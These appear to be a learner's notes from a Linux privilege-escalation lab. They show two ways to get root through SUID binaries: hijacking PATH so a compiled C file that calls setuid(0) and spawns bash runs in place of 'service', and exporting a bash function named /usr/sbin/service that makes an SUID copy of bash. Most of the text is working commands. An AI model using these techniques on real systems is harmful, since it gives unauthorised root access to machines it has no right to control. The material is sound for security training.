how to find the variables:
env
things like PATH, SSH_CONNECTION, PWD, OLDPWD
Can we change the path to get privilege escalation?
find command:
find / -type f -perm -04000 -ls 2>/dev/nullwhat’s significant about the env program:
/usr/local/bin/suid-env
can we run strings?
strings /usr/local/bin/suid-env
Not making sense but at the end it’s starting apache2.
It’s using service from path. What is path?
print $PATH
these are considered PATH that it looks for the command in those.
The Attack:
what if we change where service is being called from? What if we created a malicious file called service, and made it execute so we can be root? We change the PATH to achieve this.
How:
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/service.cdouble check:
cat /tmp/service.cCompile service.c:
gcc /tmp/service.c -o /tmp/serviceNow change PATH to go to our malicious compiled file:
export PATH=/tmp:$PATHcheck that PATH was changed:
print $PATH
/tmp was added and called first in the list. This means it will find service in our folder before checking the actual legitimate service in other PATHs.
Now we can run the same file that starts apache and it will run our file and give us root:
/usr/local/bin/suid-env
whoami
What about:
/usr/local/bin/suid-env2run strings on it:
strings /usr/local/bin/suid-env2/usr/sbin/service apache2 start
it’s a specific folder for service. Can we overwrite it?
Create a file:
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/service.ccompile it in the folder specified:
gcc /tmp/service.c -o /usr/sbin/serviceno permission. Not sure.
How he did it:
Create a malicious function:
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }export the function:
export -f /usr/sbin/service-f means refer to a shell function (that we defined above)
run it:
/usr/local/bin/suid-env2
Root again!